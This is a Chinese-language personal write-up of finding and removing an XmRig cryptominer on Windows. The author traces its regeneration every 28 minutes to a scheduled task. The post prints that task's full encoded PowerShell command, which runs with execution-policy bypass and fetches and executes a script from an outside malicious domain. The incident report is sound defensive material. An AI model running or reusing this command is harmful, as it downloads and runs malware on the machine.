昨天从网上下了某个BT种子的工具,第二天电脑卡的一匹,并且defender频繁报毒。由于报毒项名称是officekms.exe,由于之前是使用过kms激活office,所以先不管。另外有两项go.exe和goo.exe不断被杀,不断重生;在任务管理器里发现了一个进程叫XmRigMiner的进程,网上说是挖矿工具,在C:/ProgramData也发现挖矿工具,于是确定被植入挖矿病毒。
首先进入到目录C:/ProgramData,删除不明的程序,然后进入go.exe和goo.exe的目录C:/Users/Public,发现5个病毒文件,删除之;又发现一个文件夹"1",里面看上去有大量不明文件,删除之。后来发现windows defender又报毒,程序又重生。立即删除了重生的文件。然后我把C盘和D盘翻了个底朝天,竟然一无所获。
后来发现病毒又重生,于是,发现矿机重生时powershell在后台运行,并且cpu比较高。于是结束了powershell。卡掉的机器直接就流畅了。所以判断恶意程序使用powershell重生。查看defender,发现昨天夜里病毒大量重生,且规律地每28分钟就重生一次;
怀疑是计划任务。打开计划任务管理程序,果然,发现一个可疑的计划任务,每隔28分钟运行powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA
后面的字符串看着就像base64,于是心中窃喜,到网上解码。
打开网址,就得到了明文的挖矿脚本。禁用这个计划任务,就阻止了病毒再生。珍爱计算机,远离不明软件。
(update 2020.10.16)事后一个月在网上查找,上面那网站是和匿影组织有关的网站,之前这个网站上挂了wannaren勒索病毒,到某一天就删掉了下载勒索病毒的代码只留下矿机。只中了挖矿病毒已经是一个比较好的结果了。这个网站到现在还没被墙,GFW真是个屑墙......